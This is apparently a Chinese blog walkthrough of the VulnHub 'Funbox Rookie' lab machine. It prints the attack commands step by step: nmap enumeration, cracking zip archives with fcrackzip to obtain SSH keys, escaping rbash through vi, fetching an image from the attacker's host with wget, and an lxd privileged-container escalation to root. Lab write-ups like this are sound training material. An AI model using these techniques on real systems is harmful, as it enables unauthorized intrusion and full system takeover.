vulnhub-funbox-2-funxbox-rookie rookie wp

最新推荐文章于 2024-05-02 20:46:40 发布

赛博雨天

最新推荐文章于 2024-05-02 20:46:40 发布

阅读量429

点赞数

分类专栏： vulnhub

本文链接：https://blog.csdn.net/yutianovo/article/details/108585681

版权

vulnhub 专栏收录该内容

23 篇文章 0 订阅

订阅专栏

靶机描述

Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first.

This VM is created/tested with Virtualbox. Maybe it works with vmware.

If you need hints, call me on twitter: @0815R2d2

Have fun...

This works better with VirtualBox, rather than VMware

下载 https://www.vulnhub.com/entry/funbox-rookie,520/

清单

信息搜集
- netdiscover
- fcrackzip
提权
lxd

信息搜集

靶机IP

端口扫描

nmap -A 192.168.34.172

21/tcp open  ftp     ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 anna.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 ariel.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:52 bud.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:58 cathrine.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 homer.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 jessica.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 john.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 marge.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 miriam.zip
| -r--r--r--   1 ftp      ftp          1477 Jul 25 10:44 tom.zip
| -rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
|_-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 zlatan.zip
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
|   256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_  256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/logs/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

开放 21、22、80

很多文件

apache默认页面

21

将ftp文件下载下来

压缩为加密的

内容为 id_rsa

fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt cathrine.zip

得到压缩包密码

Tom 用户

连接到 tom 用户

漏洞利用

现在以及发现漏洞所在 [^1]

切换至 /tmp 时

返回 rbash

绕过

vi
:set shell=/bin/bash
:shell

现在已经可以切换了

Kali

使用 python 将文件传输过去

靶机

切换至 /tmp

wget http://192.168.34.160:8000/alpine-v3.12-x86_64-20200804_1103.tar.gz
// 下载
lxc image import alpine-v3.12-x86_64-20200804_1103.tar.gz --alias  y2my
// 导入
lxd init
//初始化

lxc init y2my privesc -c security.privileged=true
lxc config device add privesc y2my disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh


依次输入

获取root

得到flag 文件内容

赛博雨天

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
vulnhub-funbox-2-funxbox-rookie rookie wp

靶机描述Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first.This VM is created/tested with Virtualbox. Maybe it works with vmware.If you ne
复制链接

扫一扫